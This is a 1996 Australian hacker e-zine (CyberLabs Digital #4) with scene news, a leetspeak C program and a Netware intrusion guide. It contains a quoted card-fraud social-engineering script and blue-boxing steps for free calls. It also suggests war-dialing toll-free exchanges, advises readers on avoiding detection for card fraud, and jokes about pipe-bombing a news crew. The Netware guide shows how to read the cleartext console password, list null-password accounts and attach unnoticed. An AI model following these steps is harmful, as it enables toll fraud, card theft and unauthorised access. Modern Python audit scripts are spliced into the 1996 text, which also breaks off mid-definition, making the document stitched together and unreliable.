-= Issue #4  14/8/96 =-                                THE PROFESSIONAL EDITION

  ._---°--------------------------------------------------------°-_.
  | [-=-=-=-=-=-=-=-=-=-=-=-=-=- cREW -=-=-=-=-=-=-=-=-=-=-=-=-=-=-] |
  |                                                                 |
  |   BlackHaze      EDiTOR                                         |
  |   Diceman        C0-EDiTOR                                      |
  |   MR MiLK        NEWS                                           |
  |   R|[o[HeT       DiGiTaL k0URiER                                |
  |   LSD CHa0S      C0DER/WRiTER                                   |
  |                                                                 |
  | [-=-=-=-=-=-=-=-=-=-=-=-=- WRiTERS -=-=-=-=-=-=-=-=-=-=-=-=-=-] |
  |                                                                 |
  |   Myst                                                          |
  |   aCiD XTReMe                                                   |
  |   MiNDWaRP                                                      |
  |   JET BLACK                                                     |
  |   PAiN_HZ                                                       |
  |                                                                 |
  | [-=-=-=-=-=-=-=-=-=-=-=-=- C0NTACT -=-=-=-=-=-=-=-=-=-=-=-=-=-] |
  |                                                                 |
  |   SUBSCRiPTiONS:                   bend@st.nepean.uws.edu.au    |
  |   SUGGESTiONS/SUBMiTTING ARTiCLES: bhaze@fl.net.au              |
  |                                    diceman@fl.net.au            |
  |                                                                 |
  | [-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-] |
  |                                                                 |
  |                    KN0WLEDGE iS N0T A CRiME                     |
  '----° CyberLabs Digital °----------------------------------------'

.____________________________________________________________________________.

-= Preface

Welcome to CyberLabs Digital issue #4. A lot has changed since the previous
issues of CLD: we have gathered up new crew and now have a permanent home on
#security on OzNet. Not only have we strived to bring you quality HP articles
this issue, but we are also trying desperately to unite the HP scene within
Australia, as we feel that the time has come.

As you have already noticed, one major change is the removal of the reader.
And yes, it was cruddy, so from now on CLD will be sent out in ASCII. Before I
forget to mention it, Diceman has taken over as co-editor!

In the covers of this issue we have included a k-rad codez ;>, a Netware
security article, a phreaking article, a story on the life, an article on
scanning, and finally a Java segment, amongst others. An almighty thanks to
all who contributed. Blah, enough said, let issue 4 begin!

BlackHaze & Diceman

.____________________________________________________________________________.

-= C0NTENTS

 1. Subscribe ...........................................
 2. Disclaimer ..........................................
 3. Unite The Scene .....................................
 4. CLD News & Views ....................................
 5. Elite Speak .........................................
 6. Netware 3.1x/4.x Uebercracker Tips and Resources ....
 7. Perl Exploit ........................................
 8. Scanning Made Easy ..................................
 9. OzPhreakin' .........................................
10. #SECURiTY lame & weird quotes ....................... <#security>
11. The Basics of Sniffing ..............................
12. Getting Trashed By The Cops ......................... < ANON ;) >
13. Java Security - Does Sun's new language promise
    security risks on the Internet ......................
14. neXt iSSUE ..........................................

.____________________________________________________________________________.

-= SUBSCRiBE =-

If you would like to subscribe to CyberLabs Digital Inc., just follow these
instructions:

1. Send an email to "bend@st.nepean.uws.edu.au".
2. Set the "Subject:" field of the email to 'CyberLabs Subscription'.
3. The first line of your email should read: SUBSCRIBE CYBERLABS DIGITAL

  ._______________________________________________________________.
  | G R E E T Z                                                    |
  | =- Mr Milk, Diceman, Nemesis, NiCkY, VOiD, Shaman -=           |
  | =- Frog, Myst, Freedom, Stux, aCidx, Tusker, TWiliGHT -=       |
  | =- Fusion, Data King & all the #security ppl on OzNet -=       |
  '_______________________________________________________________'

-= DiSCLAiMER

Blah.

- CLD Staff

-= Unite The Scene -=
By: CLD Staff

What was the last Australian hacking or phreaking home page you visited? The
chances are that over 90% of the information resources you use as a hacker or
phreaker will have come from the US. We constantly hear the question "I have
read all the US phreaking articles, does it work here?". At one point in life
everyone is a newbie; information does not need to be handed over on a silver
platter, but as it stands there is little Australian-related information
available.
Unfortunately, while there are still many HP related boards in Oz, few carry a
substantial amount of information, and the ones which do require that you have
access.

Have you noticed that there appears to be no Australian HP scene? The scene
has always been there; you just had to look hard. Recent events such as the
movie 'HACKERS' have spawned newbies in their hundreds into the scene. Media
hype also plays an important role in how the scene is shaped and in who
becomes interested. As many of us can see, the more active the scene is, the
better!

With the HP scene slowly on the increase, so too is the rapid growth of the
warez scene. This is a pity to see, as many of the k0uriez do nothing to
contribute to the HP scene other than leech commercial software, thinking they
are elite and carrying huge egos. CLD does not hold anything against the mass
of warez groups within Oz; we would just like to see them aid somewhat in
lifting the HP scene off the ground for good.

Whether you have been at it for years or are just starting, everyone needs
information sources. We at CLD will strive to bring an important part of this
to you. CLD is not only about H/P, it is about researching topics and building
knowledge. We implore you to write your experiences down or part with some of
your knowledge, so that we will in turn achieve a greater technical level
within our articles. The end result of this can only be more knowledge.

CLD has moved through three issues. As each issue passes, the technical
content has improved significantly. It can be seen that CLD is growing in many
ways, and we the editors hope that the readers will also grow with us. Now is
the time for people to share their ideas and to grow with each other. The time
is near for the HP scene to unite; we will be there aiding the scene and hope
you will join us on the long road ahead...

Cheers,
BlackHaze & Diceman
Editor/Co-Editor

.____________________________________________________________________________.
-= CLD NEWS & ViEWS -=
By: Souprd00d aka Mr_Milk & the CLD crew

Alrighty then... I guess this is really the first news section that will
actually occupy more than a couple of lines. I decided that CLD needed a
decent section to cover little tidbits and other stuff like that. Hopefully it
will turn out ok. If you have any recent news relating to Aus HPA then mail it
to me at edjjs@alinga.newcastle.edu.au, and I will make sure it gets printed
here.

****/ KUA stamps Authority on AUS scene \**** (NOT!)

A couple of underground boards started cropping up as KUA distros. KUA are a
supposed HPA group with the members Mr Hacker, HandS and Gothik. Sound
interesting?.... a HPA group in Australia, too good to be true? Yeah,
probably. After checking out some of their releases with some of the
#security guys I found myself laughing as I had never laughed before. The
topics were covered in a couple of lines and everything was so vague and
undescriptive (my cat is a more elite hacker than you). Don't believe me? Ok,
I will include a golden example of what KUA is and is about.

----------------------------------begin KUA Gold----------------------------

How To Get VALID Credit Cards In OZ
===================================

Ever wonded how people got all the VALID credit card numbers from? Ok read
on! first ya get your white pages (or fonedisk) out and find a target :) ring
up the guy, and tell him/her ya r calling from Telstra and the billing
computer had crashed so all the info is lost, then ask him/her wat method they
used 2 pay for the fone bill last time, if they said Credit card then say "Can
I have the number and the expire date again please" they will normally give it
2 ya.. so here ya go just got ya self a card.. umm thats it.. be careful and
*** DO NOT *** spread this file 2 any public or little lame board, I dont want
some little lamers 2 know this!!
How To Rip Off A Slot Machine
=============================

theres a button at the back of poker machines which you press and it gives
you a jackpot (usually red or black) i presume its there to get all the money
out of the machine.

-Gothik & Mr Hacker- KUA'96

----------------------------------end KUA Gold---------------------------------

[ed note: wow, KUA is thriving from such intelligence. NOT! Why not send KUA a
friendly little email... heheh, we know we will :) wup@ozemail.com.au]

Ok, that was the ever popular credit card number/slot machine article; as you
can see it is streaming with depth and creativeness. If you think I am flaming
KUA as a group then you are mistaken. Australia needs hacking groups, but you
need to ask yourself: do we need groups like KUA with obviously minimal
ability? Well, anyway, whilst they are around I WILL continue to read their
stuff, not because I will learn but because I will laugh every time they write
another article... WAREZ anyone? :>

--

Western Australian Reporter: Peter Morris

AUSTRALIA'S 2.7 million analogue mobile phone users risk having their accounts
electronically stolen and bills in their names rung up for thousands of
dollars, according to two Perth men.

According to Telstra, the pair ran up a bill of more than $15,000 on an
Adelaide man's mobile phone over a six week period. Telstra has described it
as Australia's worst case of phone fraud.

The pair, Bob and Richard (not their real names), aged 20 and 19, say they
hacked into the mobile phone analogue network - a process known as phreaking -
"to prove how insecure the network is".

They "stole" the electronic signature from Adelaide signwriter Murray Goodes'
phone by modifying their own analogue phone to scan the network and catch the
electronic serial numbers (ESN) on to a computer as they were broadcast.
Using an old analogue phone and computer, together with freely available
software, the ESN was then programmed into the phone to enable it to access
the network masquerading as Mr Goodes' phone.

Bob and Richard say they were motivated by anger at Telstra's constant
assurances that the analogue network was secure.

"We were interested in how long it would take for Telstra to track us down. If
we wanted to avoid getting caught, it would have been very easy to cover our
tracks," Richard said.

The analogue system is the older of the two cellular phone networks operating
in Australia. The Federal Government has announced it will be closed by the
end of the century. Mobile subscribers are being encouraged to use the newer
and more secure digital network. Suppliers say demand for analogue mobile
phones has slowed dramatically this year.

Telstra spokeswoman Lesley Tannerhill said consumers should be aware that the
potential for phreaking was limited to the analogue network and the company
was able to detect it. She said customers whose phones were misused would not
be liable for the bill.

Bob and Richard said they chose to steal a number from an Adelaide based
subscriber so it was clear to Telstra that Mr Goodes was not responsible for
the calls and so would not be forced to pay the bill.

Mr Goodes said he has been assured by Telstra that he would not be held liable
for the $5333 bill he received, more than $5000 over his normal monthly
account. As a sole proprietor he said he was dependent on the mobile phone for
work and there had been a noticeable drop-off in business last month - he
estimated a 60 per cent fall.

"I don't think they understand the damage they can do to people's business,"
Mr Goodes said.

Bob and Richard used the phone freely for six weeks before being raided by the
Australian Federal Police about two weeks ago. No charges have been laid. They
used the phone about 18 hours a day, mostly calling overseas, including sex
chat lines in Israel.
Easy picking for security experts
---------------------------------

TO THE casual observer, Bob and Richard look like a couple of successful
20-somethings: well-dressed and easily able to supplement their bachelor
eating habits with regular splashes at expensive restaurants.

The outward appearance accurately reflects their professional lives as
computer security consultants whose skills are so highly sought-after they
have the potential to earn well over $100,000 a year.

"We work pretty much how and when we want," Richard said.

Both started university but left in the first year when they found the
learning experience on campus too slow. They see phreaking (getting free use
of telephones) and hacking into computer systems as inextricably linked.
Having developed a childhood fascination with the technology, they now see
hacking as the fastest way to keep updating their skills.

And while there may be a great deal of scepticism among computer system
operators about their motivation, Nick Chantler, an army counter-intelligence
instructor who has completed a major study of hackers, said this thirst to
learn more about systems was common.

"The vast majority of them are not evil, they just want to increase their
knowledge," he said. But he said sometimes this enthusiasm could overwhelm
their ethical constraints.

After years researching hackers, Dr Chantler has enormous respect for the
knowledge and ability elite hackers have, something he believes many big
organizations are completely blind to.

"There is nothing they can't do if they set their minds to it," he said. "The
elite hackers could bring Australia to its knees."

He said that throwing the book at phreakers and hackers was not the answer
because of the damage they could wreak.

"What I would be doing with these guys is to quietly pull them aside and try
to learn as much as I could about what they know," Dr Chantler said.
Pipe Bomb explodes in boy's hand
--------------------------------

I was watching WIN television one night while on IRC; why the hell I was
watching WIN I don't know! And as usual the 10:45 news appears, and lo and
behold, pipe bomb explodes in boy's hand... Stunned, I turned around and
watched the news and to my utter amazement I was shocked at how lame this
teenager was... using a hammer with a pipe bomb? Wow, that just proves his
vast intelligence HA. Not only did the media over-hype this story, they also
had to relate it to the bomb blast in Atlanta. Now as usual the media needed a
ground-breaking story, so of course what do they do: the Internet is to be
blamed, as files on illegal bomb construction can be found. By this stage I
was furious; I felt like physically driving down to the scene and lobbing a
few hundred pipe bombs out of my car's window, while yelling 'This is how you
make a pipe bomb, lamer!' whilst several WIN camera men are sent flying
through the air. I guess that some loser of a politician will bring the matter
up in parliament; it will be a great surprise if any action is actually taken,
besides, they can't do a simple thing. Well, let's hope not. Anyhow, we find
that constructing pipe bombs is one of the dumbest things, and always the
lamers are the ones who find themselves fuqd' up in the end. Along with all
the try-hard Anarchist groups within Oz and lamers bragging about how damn
gewd they are at constructing explosives, there's no hope :)

049 gets busted, well almost!
-----------------------------

During last month (maybe this month too) Federal Police were in Newcastle to
help local ISPs (hunterlink) and national Points-Of-Presence (ozemail, access1
etc.) riddle out credit card fraud. Obviously, with the easiness of fake
accounting, something would need to be done to weed them out. No arrests have
been made yet involving credit card fraud on the ISP, but I guess it will only
be a matter of time before some WaReZ kiddie goes down.
So just a warning: anyone using Newcastle ISPs, or even anyone in NSW, lay off
the credit cards for a while at least, as the beer gut bad boys are in town.
One person has been arrested already regarding ordering $1000 of goods from a
local store with a fake credit card that he got from the Internet. This is
what initially started the interest in credit card fraud. I am sure the Fedz
will be looking for more heads so don't let it be you.

Sticking with credit card fraud, there are enormous rumours that Ozemail have
the Fedz helping them catch kiddies using fake cc#'s. So again, lay off the
fraud for a while.

Boards springing up over the country
------------------------------------

A large number of HPA related BBSs are starting to crop up. Although a lot
only have a minimal filebase and no decent msg areas going, it is good to see
that an underground is starting to form. If you are a sysop of a HPA related
BBS, keep going and keep putting in an effort to make your bbs elite.

The Blue Box Myth
-----------------

I am sick and tired of hearing on irc that Blue Boxing in Australia is dead.
Sure, most of the Australian telephone switching system is already converted
to digital and it is impossible to blue box within Australia. HOWEVER, the way
to successfully blue box in Australia is to first call another country that
has a shithouse phone system and a bad connection to Australia. You call
another country using the 1800 country direct numbers (1800 881 ***); these
will connect you to another country's fone exchange for FREE. Alright, most
are robotised and allow you to make calls using a calling card or some even a
credit card; you can bail out now and just use your fake cc #'s etc to dial
back into Australia for free calls. However, if you don't want to get caught
easily you can blue box your way back into Australia. To do this you will need
a tone generator; scavenger is a good start.. or even BlueBeep will do. Ok,
set up a simple two tone sound of 2400+2600 and then 2400...
I will leave the timing and volume up to you... but after you hear a chirp
when dialing the country direct number you send the seize tones down.. you
should hear the tones played back to you... if this is the case you have a
successful seize and all you have to do is usually dial KP2 + country code + 0
+ number + ST and it will work. If it hangs up on you when you play the tone,
it means that the timing is too long and you should adjust it. Also volume is
important, so tweak away with it as well. So it is possible to blue box within
Australia, you just have to use a cheap country like Aruba to help you on your
way.

SUMMARY: dial country direct to distant country. Seize line. Dial back into
Australia.

Hacking in Australia
--------------------

There are many 1800 numbers that can be scanned with a program such as
ToneLoc or TheScan. Good exchanges to start on are the 1800 801 *** and
1800 124 ***. These have many carriers and can be a good starting point. These
are all carriers and contain some decent computers. Have a look and see them
for yourself... hey, they aren't costing you anything.

CONCLUSION: Ok, that wraps up my first attempt at a news article... so hope
you liked it etc. and I will catcha in the next issue. Remember, the Aus HPA
scene needs you to grow!

.__________________________________________________________________________.

-= ELiTE SPEAK =-

Elite Speak should compile under any unix platform or PC. You will have to
call ExitToShell() rather than exit() to compile under SIOUX ANSI C.
/*
   Elite Speak
   Author:  CLD Crew - bhaze@fl.net.au
   Date:    8/13/96
   Version: 1.1

   Usage:
      > type the required text here
     >> +Yp3 +h3 R3qu1r3d +3x+ h3R3
*/

#include <stdio.h>
#include <stdlib.h>

/* Return 1 if pass is an upper-case letter 'A'..'Z' (65..90), else 0 */
int upper(char pass)
{
    if ((pass <= 90) && (pass >= 65))
        return 1;
    else
        return 0;
}

/* Return 1 if pass is a lower-case letter 'a'..'z' (97..122), else 0 */
int lower(char pass)
{
    if ((pass <= 122) && (pass >= 97))
        return 1;
    else
        return 0;
}

int main(void)
{
    int ChangeToUpper = -32, ChangeToLower = 32;        /* ASCII case offsets */
    int HE = 69, HO = 79, HI = 73, HS = 115, HT = 116;   /* E O I s t         */
    int H1 = 49, H3 = 51, H0 = 48, H5 = 53, Ht = 43;     /* 1 3 0 5 +         */
    char buffa[100];
    int NumOfChars = 0, count = 0, scuz = 0;

    printf("\n");
    printf("3L1+3 5p3Ak V3r510n 1.1 - By th3 CLD cr3w bhaze@fl.net.au \n \n");
    printf("> ");

    /* Read one line (up to 99 characters); stop at newline, EOF or any control char */
    do {
        buffa[NumOfChars] = getchar();
        NumOfChars++;
    } while ((NumOfChars < 100) && (buffa[(NumOfChars - 1)] >= 32));
    NumOfChars--;   /* drop the terminating character */

    printf("\n");
    printf(">> ");

    while (count < NumOfChars) {
        /* Letter substitutions: e->3, o->0, i->1, t->+, s->5 (either case) */
        if ((buffa[count] == HE) || (buffa[count] == (HE + ChangeToLower)))
            buffa[count] = H3;
        if ((buffa[count] == HO) || (buffa[count] == (HO + ChangeToLower)))
            buffa[count] = H0;
        if ((buffa[count] == HI) || (buffa[count] == (HI + ChangeToLower)))
            buffa[count] = H1;
        if ((buffa[count] == HT) || (buffa[count] == (HT + ChangeToLower)))
            buffa[count] = Ht;
        if ((buffa[count] == HS) || (buffa[count] == (HS + ChangeToLower)))
            buffa[count] = H5;

        /* Flip the case of every fourth remaining letter (when scuz == 1) */
        if ((scuz == 1) && (upper(buffa[count])))
            buffa[count] = buffa[count] + ChangeToLower;
        else if ((scuz == 1) && (lower(buffa[count])))
            buffa[count] = buffa[count] + ChangeToUpper;

        if (scuz < 3)
            scuz++;
        else
            scuz = 0;

        printf("%c", buffa[count]);
        count++;
    }

    printf("\n");
    getchar();
    exit(0);   /* ExitToShell() <--- use instead under SIOUX ANSI C */
}

.____________________________________________________________________________.
Diceman's Netware 3.1x and 4.x Uebercracker Tips and Resources
==============================================================
by diceman@fl.net.au

CONTENTS
========

Getting a feel for the Network
   Netware Three
   Netware Four
How a Uebercracker gets Supervisor rights
How a Uebercracker keeps his rights
Where are those error logs and what do they log?
A listing of utilities to penetrate Novell Netware - some of the things that
   are possible.

==============================================================================

This was written at the beginning of 1995 as a reference guide for myself.
Since then it has not been updated, due to the fact that I have moved to unix.
Despite this, to all the die hard unix hackers: the fact is that 88% of the
top 1000 Fortune companies use Novell Netware, and that counts for
something ;>.

I have tried to include original information, which has succeeded to a degree.
The introduction to Netware security is, I believe, a first. This file
contains no specific version 4 hacking, so its usefulness may be limited.
Note that it is still an excellent reference for people new to Netware.
Obviously, information has been taken from sources, and credit has been given
where intended. A special note for the Netware Hacking FAQ by Simple Nomad is
in order.

==============================================================================

Getting a feel for the Network
==============================

1. NETWARE THREE
================

How many servers are there?
---------------------------

It is always good to know how many servers there are on the network you are
on. The simple command "slist" will perform this; you do not need to be logged
in. The file should usually be held at sys:login\slist.exe. Notice in the
status column that servers can be Default and Attached if you are logged into
the network.
Here is the output:

Known NetWare File Servers       Network   Node Address   Status
--------------------------       -------   ------------   ------
ECHIDNA                          [  A0001][           1]  Attached
HAKEA                            [   FACA][           1]
MELAB                            [  BAD1E][           1]
MEOFF                            [   D1ED][           1]
MOFF                             [      2][           4]
MOTHER                           [ FADED0][           1]
NURSING_1                        [    256][           1]  Default
PDU                              [    30A][           1]
PRFMIS                           [  BEAD1][           1]
RECORDS                          [   ABBA][           1]
SERVER1                          [ 1B0000][           1]
[Snip]
Total of 35 file servers found

The Login Script
----------------

This file, the "login script", is processed by everyone who logs into the
network, as opposed to attaching. It is held at sys:\public\net$log.dat. This
file is in clear text and, if you have the rights, can be edited. The file
often shows batch files that will be processed by certain users. It is good
to review these files to see how the network is managed and what programs are
loaded. Notice the "exit" at the end of the file. If this command is not
issued, then individuals can utilise personal login scripts.

Here is an example (my creation ;>):

pccompatible
map display off
rem ---------------------------------------------------------------------
rem User drive mappings
map errors off
if member of "lockout" then exit "lockout"
if login_name is "supervisor" then begin
   map r j:=sys:user\other
else
   map r j:=sys:user\%login_name
end
map errors on
rem ---------------------------------------------------------------------
rem Other mappings
map f:=sys:default
map r m:=sys:data
map r INS s1:=sys:public
map r INS s2:=sys:programs\%smachine\%os_version
map r INS s3:=sys:std
comspec=s2:command.com
rem --------------------------------------------------------------------
rem Special logins
if login_name is "PRINTER" then exit "prn-user"
if login_name="FAXHQ" then exit "faxhq"
if login_name="ANYWHERE" then exit "pcany"
if login_name="backup" then exit "emerald"
if login_name="asc" then exit "command /c asc"
rem ---------------------------------------------------------------------
rem Start screen displays
write
write "Good ";greeting_time;", ";full_name;"."
write "It's ";day_of_week;", ";day;" ";month_name;", ";year;", and the time is ";hour;":";minute;" ";am_pm;"."
write "You are now logged on at station ";station;"."
write
set prompt = "$P$G"
set name = "%LOGIN_NAME"
set wp51name = "%FULL_NAME"
if member of "BTSG" then set BTS = "G1"
rem -------------------------------------------------------------------------
rem Set printer capturing
#capture l=1 q=printq_0 nt nb nff ti10
#capture l=2 q=printq_1 nt nb nff ti10
rem ---------------------------------------------------------------------
rem Special Group conditions
if member of "wbmas" then map q:=sys:wbmas
if member of "audit" then map k:=sys:audit
if member of "it" then exit "it"
exit "mlk"

The autoexec.ncf
----------------

The autoexec.ncf is one of the two startup files for the Netware server, the
other being startup.ncf. Here is one of my creations:

rem -----------------------------------------------------------------------
file server name hack
ipx internal net B00B
rem -----------------------------------------------------------------------
REM BINDING IPX TO THE ETHERNET BOARD
rem load ethertsm
load ne1000 port=300 int=3 frame=Ethernet_II name=hacknet
bind ipx hacknet net=1
rem -----------------------------------------------------------------------
REM BINDING TCPIP TO THE ETHERNET BOARD
load snmp
load tcpip rip=no
bind ip hacknet ad=129.1.0.3 ma=255.255.255.0
rem -----------------------------------------------------------------------
REM LOADING DISK DRIVERS
load isadisk port=1F0 int=E
rem -----------------------------------------------------------------------
REM MOUNTING ALL HARD DRIVES
mount all
rem -----------------------------------------------------------------------
REM LOAD A FEW LOGS - AFTER CLIB HAS BEEN AUTO LOADED BY TCPIP - AND SYS MOUNTED
load c:\server.312\conlog.nlm
load c:\server.312\snmplog.nlm
rem -----------------------------------------------------------------------
REM SECURITY
secure console
remove dos
set allow unencrypted passwords = off
rem -----------------------------------------------------------------------
REM LOADING BASIC NLMS FOR OPERATION
search add c:\server.312
rem load streams - AUTO LOADED BY TCPIP
rem load clib - AUTO LOADED BY TCPIP
load nut
load mathlib
load tli
load ipxs
load spxs
load remote remote
rem the above line sets the remote console (sys:\system\rconsole.exe) passwd
load rspx
rem load pserver pserver
load monitor P NH
rem -----------------------------------------------------------------------
REM LOAD ADD ON NLMS
search add c:\server.312\nlms
load eventmon -l sys:etc\eventmon.log -a
load nwshell
rem -----------------------------------------------------------------------

This is one of the most important files for the Netware server. It can be
located in two positions: either c:\server.312\autoexec.ncf (or similar) or
sys:\system\autoexec.ncf. This positioning is very important, because the
file on c: is a lot harder to get at than the one on sys:. For example, if the
sys admin has left himself logged in, a simple "type sys:\system\autoexec.ncf"
retrieves the rconsole password, and thus all security levels have been
breached.

The autoexec.ncf tells the Netware server what NLMs to load upon startup. Note
that conlog.nlm is loaded; this is described below. Also eventmon, which
monitors all changes in the file system and the bindery.

Who are the users, and what is the structure of the groups
----------------------------------------------------------

By default every new user created on the Novell network is added to the group
everyone. By entering the program "syscon", held usually at
sys:public\syscon.exe, a complete listing of users and groups can be found.
An easy way to get all the users and groups into an ASCII text file is through
the use of a third party utility. Use the utility grplist.exe to retrieve a
listing of groups or a full listing of users. For example the command:

grplist {server}\everyone - provides a listing of all users in the group
                            everyone.
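The autoexec.ncf weaknesses the article points at above (the RCONSOLE password sitting in clear text on a "load remote" line, and the "secure console", "remove dos" and "set allow unencrypted passwords" settings) are easy to check for mechanically. The following is an added example, not CLD's or Novell's code: a small audit script for an NCF file. It assumes the NCF syntax shown in the article (one command per line, "rem" lines are comments, the argument after "load remote" is the console password); the two sample files inside it are constructed from the article's example, not taken from a real server.

```python
# Added example (not from the article): audit an autoexec.ncf for the settings
# the article calls out. Assumptions: one command per line, 'rem' starts a
# comment line, and any argument after 'load remote' is the RCONSOLE password.

# Constructed sample modelled on the article's autoexec.ncf (not a real file).
SAMPLE_NCF = r"""
rem -----------------------------------------------------------------------
file server name hack
ipx internal net B00B
load tcpip rip=no
REM SECURITY
secure console
remove dos
set allow unencrypted passwords = off
load remote remote
rem the above line sets the remote console (sys:\system\rconsole.exe) passwd
load rspx
load monitor P NH
"""

# Constructed weak variant: cleartext client passwords allowed, console not secured.
SAMPLE_WEAK_NCF = r"""
file server name weak
load remote
set allow unencrypted passwords = on
load rspx
"""


def parse_ncf(text):
    """Yield (command, argument string) for each non-comment, non-blank NCF line."""
    for raw in text.splitlines():
        parts = raw.strip().split(None, 1)
        if not parts or parts[0].lower() == "rem":   # 'rem' lines are comments
            continue
        yield parts[0].lower(), (parts[1].strip() if len(parts) > 1 else "")


def audit_ncf(text):
    """Return a list of findings for the security-relevant lines of an NCF file."""
    findings = []
    seen_secure_console = False
    seen_remove_dos = False
    for cmd, args in parse_ncf(text):
        lower = args.lower()
        if cmd == "secure" and lower == "console":
            seen_secure_console = True
        elif cmd == "remove" and lower == "dos":
            seen_remove_dos = True
        elif cmd == "set" and lower.startswith("allow unencrypted passwords"):
            value = lower.split("=", 1)[1].strip() if "=" in lower else ""
            if value == "on":
                findings.append("SET ALLOW UNENCRYPTED PASSWORDS = ON: "
                                "clients may send cleartext passwords")
        elif cmd == "load":
            tokens = args.split()
            # 'load remote <password>': the argument is the RCONSOLE password,
            # readable by anyone who can read the file (assumed plain form).
            if tokens and tokens[0].lower() in ("remote", "remote.nlm") and len(tokens) > 1:
                findings.append("LOAD REMOTE carries the RCONSOLE password in "
                                "cleartext: %r" % tokens[1])
    if not seen_secure_console:
        findings.append("SECURE CONSOLE is not issued")
    if not seen_remove_dos:
        findings.append("REMOVE DOS is not issued")
    return findings


if __name__ == "__main__":
    for name, ncf in (("article file", SAMPLE_NCF), ("weak file", SAMPLE_WEAK_NCF)):
        print(name)
        for finding in audit_ncf(ncf):
            print("  -", finding)
```

Run against the article's own file the only finding is the cleartext console password; the weak variant additionally reports the unencrypted-password setting and the two missing console hardening commands. The point for a defender is that the file's location (c: versus sys:\system) decides who can read that password, so the audit is only as useful as the file permissions around it.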
grplist                  - provides a listing of all users on a server.

Which users do not have passwords
---------------------------------

Login as any user. Use the utility "chknull" by itsme; this will return a
listing of users with null passwords.

02000002 0001 ANYWHERE HAS a NULL password
04000002 0001 ASC      HAS a NULL password
2b000001 0001 MIDBACK  HAS a NULL password
36000001 0001 PRINTER  HAS a NULL password
3b000002 0001 TEMP     HAS a NULL password
3e000001 0007 PSERVER  HAS a NULL password

The pserver can not be logged into from the login prompt. To see what rights
these userids have, use "attach {username}" instead of login. Beware if
accounting is installed.

Are the default accounts still in existence
-------------------------------------------

Upon installation Netware 3.1x creates two users:

Supervisor
Guest

What rights do I have
---------------------

It is important to see what rights your userid has. The commands "rights",
"whoami" and "list" are particularly useful.

Rights - by itself tells the user what rights they have in the default
directory.

FS3\SYS:
Your Effective Rights for this directory are [SRWCEMFA]
   You have Supervisor Rights to Directory.           (S)
 * May Read from File.                                (R)
 * May Write to File.                                 (W)
   May Create Subdirectories and Files.               (C)
   May Erase Directory.                               (E)
   May Modify Directory.                              (M)
   May Scan for Files.                                (F)
   May Change Access Control.                         (A)
 * Has no effect on directory.
Entries in Directory May Inherit [SRWCEMFA] rights.
You have ALL RIGHTS to Directory Entry.

Whoami - normally tells the user which login id they are using. Whoami is also
useful to:

whoami /g - lists the groups you belong to
whoami /r - lists your effective rights in the network directory structure.
whoami /s - lists your security equivalences.
whoami /a - lists the groups, security equivalences, and your effective
            rights.

Tlist      - displays the user's trustee rights and their effective rights.
Listdir /e - displays effective rights of all subdirectories.
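The rights letters that RIGHTS and WHOAMI /R print (the [SRWCEMFA] string above) are the result of combining a trustee assignment with the Inherited Rights Mask of each directory down the path. The following is an added example, not the article's or Novell's code: a small model of that combination, together with a lookup of which common tasks a given rights string permits. The model is an assumption simplified from the article's description of the eight rights (an explicit assignment replaces inherited rights, inherited rights are filtered through the mask, and Supervisory propagates downward ignoring the mask); merging of user and group assignments is deliberately not modelled.

```python
# Added example (not from the article): model of NetWare 3.x effective rights.
# Assumptions (simplified from the article's description of the eight rights):
#   - an explicit trustee assignment at a directory replaces inherited rights;
#   - otherwise the inherited rights are filtered through that directory's
#     Inherited Rights Mask (IRM);
#   - Supervisory (S), once held, propagates to all subdirectories, ignores the
#     IRM and cannot be revoked below the directory where it was granted.
# User/group assignment merging is not modelled.

RIGHTS = "SRWCEMFA"   # Supervisory Read Write Create Erase Modify File-scan Access-control

# A subset of the "Rights for Common File and Directory Tasks" table, as letters.
TASKS = {
    "read from a closed file": "R",
    "see a file name": "F",
    "write to a closed file": "WCEM",
    "execute an EXE file": "RF",
    "create and write to a file": "C",
    "delete a file": "E",
    "rename a file or directory": "M",
    "change the Inherited Rights Mask": "A",
    "change trustee assignments": "A",
}


def effective_rights(chain):
    """chain: list of (explicit_assignment or None, irm) per directory, volume
    root first. Returns the effective rights string at the deepest directory."""
    eff = set()
    for assignment, irm in chain:
        if "S" in eff:
            eff = set(RIGHTS)          # S propagates and is immune to the IRM
            continue
        if assignment is not None:
            eff = set(assignment)      # explicit assignment replaces inheritance
        else:
            eff = eff & set(irm)       # inherited rights filtered by the IRM
        if "S" in eff:
            eff = set(RIGHTS)          # S at this level means all rights here
    return "".join(r for r in RIGHTS if r in eff)


def can(task, rights):
    """True if the rights string contains every right the task needs."""
    return set(TASKS[task]) <= set(rights)


def allowed_tasks(rights):
    return [task for task in TASKS if can(task, rights)]


if __name__ == "__main__":
    # Constructed scenarios: a supervisor-equivalent and an ordinary user
    # walking SYS: -> SYS:DATA -> SYS:DATA\PRIVATE with restrictive masks below.
    admin = [("SRWCEMFA", RIGHTS), (None, "RF"), (None, "")]
    user = [("RWCEMFA", RIGHTS), (None, "RF"), (None, "RWCEMFA")]
    for label, chain in (("admin", admin), ("user", user)):
        rights = effective_rights(chain)
        print(label, rights, allowed_tasks(rights))
```

The two constructed scenarios show why the article keeps returning to the Supervisory right: the mask "RF" on SYS:DATA cuts an ordinary user down to read and file scan for everything beneath it, but a trustee who holds S at the volume root still has all eight rights in the same subtree, and no mask placed below can change that.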
Ok, what do these rights mean?

The Eight Netware Rights
------------------------

S  Supervisory: Once granted to a user or group on a specific directory, this
   right gives the trustee holding it all rights, as well as the ability to
   grant all rights to other users or user groups on that directory and its
   subdirectories. The supervisory right itself is automatically propagated
   for the trustee holding it to all subdirectories below the one where it was
   granted, and it cannot be revoked for the trustee from subdirectories below
   the original assignment. It also overrides any restrictions put in place by
   the Netware Inherited Rights Mask. At the file level, it allows a user all
   rights to the file - and the ability to grant or modify any right to any
   file for any user or group in any directory at or below the directory where
   the supervisory rights were assigned.

R  Read: This right allows a user or group to open a file for reading or to
   run an executable program.

W  Write: Allows a user or group to open and modify a file's contents.

C  Create: At the directory level, Create allows a user or group to make
   subdirectories and files within them. If this right is the only one granted
   at the directory level, it allows the trustee holding it to create
   subdirectories and files. But once a file is closed, it cannot be seen
   using standard DOS or Netware commands (for example DIR or NDIR).

E  Erase: Controls whether or not a directory, its subdirectories and the
   files within the directory and subdirectories can be deleted.

M  Modify: Users or groups with this right have the ability to set and change
   file or directory attributes. This includes renaming directories or files
   within directories. This trustee right has no effect on the ability to
   modify the contents of a file.

F  File Scan: Users or groups must have this trustee right to see that
   directories or files within directories exist.
A Access Control:
